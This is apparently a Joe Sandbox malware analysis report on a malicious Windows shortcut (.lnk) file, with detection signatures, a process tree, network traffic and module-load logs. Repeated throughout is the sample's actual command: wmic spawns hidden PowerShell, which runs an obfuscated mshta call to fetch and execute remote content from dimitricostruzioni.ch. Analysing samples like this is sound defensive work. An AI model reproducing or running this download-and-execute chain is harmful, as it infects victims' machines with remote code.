Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
InExYnlM0N.lnk

Overview

General Information

Sample name:InExYnlM0N.lnk
renamed because original name is a hash value
Original sample name:55e5e8544221031af4684ea083f25a28.lnk
Analysis ID:1581247
MD5:55e5e8544221031af4684ea083f25a28
SHA1:05b63920efb1b3dab2da367844fa5f25f9c12bdf
SHA256:f18660faf2003e959bf103d778002ecc0ae00c9be78b94e490837500099b370c
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Contains functionality to create processes via WMI
Creates processes via WMI
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious Process Created Via Wmic.EXE
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • WMIC.exe (PID: 4176 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2360 cmdline: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mshta.exe (PID: 5692 cmdline: "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/new/files/Documents/vanillecookie MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 5340 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/new/files/Documents/vanillecookie, CommandLine: "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/new/files/Documents/vanillecookie, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2360, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/new/files/Documents/vanillecookie, ProcessId: 5692, ProcessName: mshta.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie", ProcessId: 4176, ProcessName: WMIC.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie, CommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 4176, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie, ProcessId: 2360, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5340, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: InExYnlM0N.lnkReversingLabs: Detection: 18%
Source: InExYnlM0N.lnkVirustotal: Detection: 33%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.4% probability
Source: unknownHTTPS traffic detected: 62.182.21.105:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: Joe Sandbox ViewASN Name: SUB6GB SUB6GB
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /new/files/Documents/vanillecookie HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: dimitricostruzioni.chConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /new/files/Documents/vanillecookie HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: dimitricostruzioni.chConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: dimitricostruzioni.ch
Source: svchost.exe, 00000007.00000002.3404046761.00000239E9409000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: mshta.exe, 00000005.00000002.3400840059.0000028E29368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/
Source: mshta.exe, 00000005.00000002.3400840059.0000028E29368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/a
Source: mshta.exe, 00000005.00000002.3400840059.0000028E29368000.00000004.00000020.00020000.00000000.sdmp, InExYnlM0N.lnkString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookie
Source: mshta.exe, 00000005.00000002.3400840059.0000028E29318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookie$P
Source: powershell.exeString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookie$global:?
Source: mshta.exe, 00000005.00000002.3401942251.000002962B0D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookieA
Source: mshta.exe, 00000005.00000002.3400840059.0000028E292F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookieC:
Source: WMIC.exe, 00000000.00000003.2150544769.00000146CBD4F000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000003.2150585001.00000146CBD56000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000002.2152025858.00000146CBD57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookieFriendlyName=
Source: mshta.exe, 00000005.00000002.3401232716.0000028E2ABC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookieH
Source: mshta.exe, 00000005.00000002.3400840059.0000028E292F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookieK
Source: mshta.exe, 00000005.00000002.3400840059.0000028E29318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookieOP
Source: mshta.exe, 00000005.00000002.3400735199.0000028E292C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookieTA%?
Source: mshta.exe, 00000005.00000002.3400840059.0000028E29318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookieh1
Source: WMIC.exe, 00000000.00000002.2151951037.00000146CBD27000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000003.2150462678.00000146CBD22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookiei)
Source: WMIC.exe, 00000000.00000002.2152098610.00000146CBEF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookieramFiles(x
Source: mshta.exe, 00000005.00000002.3400840059.0000028E29318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookiey.IE5
Source: mshta.exe, 00000005.00000002.3403831920.000002962BE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dimitricostruzioni.ch/new/files/Documents/vanillecookie~
Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000007.00000003.2215526716.00000239E9210000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: mshta.exe, 00000005.00000002.3400840059.0000028E29368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownHTTPS traffic detected: 62.182.21.105:443 -> 192.168.2.6:49709 version: TLS 1.2

System Summary

barindex
Source: WMIC.exe, 00000000.00000002.2151951037.00000146CBD10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie"C:\Users\user\Desktop\InExYnlM0N.lnkWinsta0\Defaultmemstr_c8542210-6
Source: InExYnlM0N.lnkLNK file: process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie"
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal80.evad.winLNK@7/8@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4156:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vyugwqc.sx3.ps1Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: InExYnlM0N.lnkReversingLabs: Detection: 18%
Source: InExYnlM0N.lnkVirustotal: Detection: 33%
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/new/files/Documents/vanillecookie
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/new/files/Documents/vanillecookieJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
